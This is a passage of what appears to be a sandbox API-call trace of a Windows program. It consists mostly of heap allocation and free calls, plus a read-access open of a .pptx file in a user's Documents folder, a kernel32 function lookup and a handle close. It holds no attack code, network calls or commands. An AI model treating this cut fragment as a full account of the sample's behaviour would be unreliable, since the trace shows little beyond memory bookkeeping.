hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.936] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\LI-IwwMLWnmp-I.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\li-iwwmlwnmp-i.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0076.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0076.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.939] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.940] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0076.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.941] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.941] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0076.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.943] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.943] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.943] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.944] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0076.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0076.944] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.944] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0076.945] CloseHandle (hObject=0x258) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.945] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.945] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0076.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: 